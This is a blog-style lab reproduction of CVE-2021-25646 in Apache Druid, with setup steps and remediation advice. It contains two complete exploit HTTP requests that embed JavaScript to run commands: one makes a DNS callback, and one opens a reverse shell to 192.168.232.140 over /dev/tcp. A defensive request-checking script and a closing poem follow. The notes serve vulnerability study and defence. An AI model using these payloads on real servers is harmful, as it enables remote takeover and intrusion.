Apache Druid Command Execution Vulnerability Reproduction (CVE-2021-25646)
Study notes download
https://download.csdn.net/download/qq_41901122/15051281
Contents
- Study notes download
- Vulnerability ID
- Vulnerability description
- Affected versions
- Environment setup
- Step 1: Install the JDK 8 environment
- Step 2: Set up Druid
- Step 3: Visit port 8888
- Vulnerability reproduction
- Finding the vulnerable endpoint
- Method 1: DNS resolution
- Method 2: Reverse shell
- Remediation advice
- Excerpt
Vulnerability ID
- CVE-2021-25646
- Published: 2021-01-29
- Severity: High
Vulnerability description
- Apache Druid is a distributed data processing system.
- Apache Druid includes the ability to execute user-supplied JavaScript code embedded in various types of requests.
- This feature is intended for high-trust environments and is disabled by default.
- In Druid 0.20.0 and earlier, a user can send a specially crafted request that exploits this flaw to execute arbitrary code.
- An attacker can craft such a malicious request directly, execute arbitrary code, and take control of the server.
Affected versions
- Apache Druid < 0.20.1
Environment setup
Step 1: Install the JDK 8 environment
sudo apt-get update
sudo apt-get install openjdk-8-jdk
java -version
which javac    # show where javac was installed
Step 2: Set up Druid
tar -zxvf apache-druid-0.20.0-bin.tar.gz
cd apache-druid-0.20.0
cd bin
./start-micro-quickstart
Step 3: Visit port 8888
http://192.168.232.183:8888/unified-console.html
Vulnerability reproduction
Finding the vulnerable endpoint
Method 1: DNS resolution
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.232.183:8888
Content-Length: 1019
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.232.183:8888
Referer: http://192.168.232.183:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{ "type": "index", "spec": { "ioConfig": { "type": "index", "inputSource": { "type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-14T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": { "type": "json", "keepNullColumns": true}}, "dataSchema": { "dataSource": "sample", "timestampSpec": { "column": "timestamp", "format": "iso"}, "dimensionsSpec": { }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping qojh5x.dnslog.cn')}", "": { "enabled": true}}}}, "type": "index", "tuningConfig": { "type": "index"}}, "samplerConfig": { "numRows": 500, "timeoutMs": 15000}}
Method 2: Reverse shell
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.232.183:8888
Content-Length: 1047
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.232.183:8888
Referer: http://192.168.232.183:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{ "type": "index", "spec": { "ioConfig": { "type": "index", "inputSource": { "type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-14T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": { "type": "json", "keepNullColumns": true}}, "dataSchema": { "dataSource": "sample", "timestampSpec": { "column": "timestamp", "format": "iso"}, "dimensionsSpec": { }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.232.140/6666 0>&1')}", "": { "enabled": true}}}}, "type": "index", "tuningConfig": { "type": "index"}}, "samplerConfig": { "numRows": 500, "timeoutMs": 15000}}
Remediation advice
- Update Apache Druid promptly (to 0.20.1 or later, per the affected-version range above).
- Configure an access allowlist or other access controls to restrict who can reach the service.
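As an added defensive example (not from the original post): both requests above place a `"type": "javascript"` filter inside `spec.dataSchema.transformSpec`, so a request-log review or WAF rule for this CVE only needs to find JavaScript-typed nodes anywhere in a sampler spec. The Python below does that walk over a raw request body; the function names, the JSON-path format and the sample bodies are my own constructions.

```python
import json

def find_javascript_nodes(node, path="$"):
    """Walk a Druid ingestion/sampler spec and return the JSON paths of every
    object typed "javascript" (filters, transforms, aggregators and extraction
    functions all use that type name)."""
    hits = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            hits.append(path)
        for key, value in node.items():
            hits.extend(find_javascript_nodes(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_javascript_nodes(value, f"{path}[{i}]"))
    return hits

def classify_sampler_request(body):
    """Return (suspicious, paths) for a raw JSON body sent to
    /druid/indexer/v1/sampler. A body that is not valid JSON is flagged
    rather than ignored, so nothing slips past the check by being malformed."""
    try:
        spec = json.loads(body)
    except json.JSONDecodeError:
        return True, ["<unparseable body>"]
    paths = find_javascript_nodes(spec)
    return bool(paths), paths

def _spec_with_filter(flt):
    # Constructed sampler-spec skeleton (not captured traffic) around a filter.
    return json.dumps({
        "type": "index",
        "spec": {
            "ioConfig": {"type": "index",
                         "inputSource": {"type": "inline", "data": "{\"added\":1}"},
                         "inputFormat": {"type": "json"}},
            "dataSchema": {"dataSource": "sample",
                           "timestampSpec": {"column": "timestamp", "format": "iso"},
                           "transformSpec": {"transforms": [], "filter": flt}},
        },
        "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
    })

# A normal selector filter, and a JavaScript filter in the same position the
# CVE-2021-25646 requests use (the function body here is a harmless comparison).
BENIGN_BODY = _spec_with_filter({"type": "selector", "dimension": "added", "value": "1"})
JS_BODY = _spec_with_filter({"type": "javascript", "dimension": "added",
                             "function": "function(value) { return value > 0; }"})
```

On a patched Druid with JavaScript disabled these nodes are rejected anyway; on the affected versions, any hit from an unexpected client is worth an alert.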
Excerpt
The crushed river of stars scatters, turning into meteors flung across the sky;
I stand beneath the star-filled heavens and make a wish:
Don't rush; everything you want will arrive, slowly, through effort.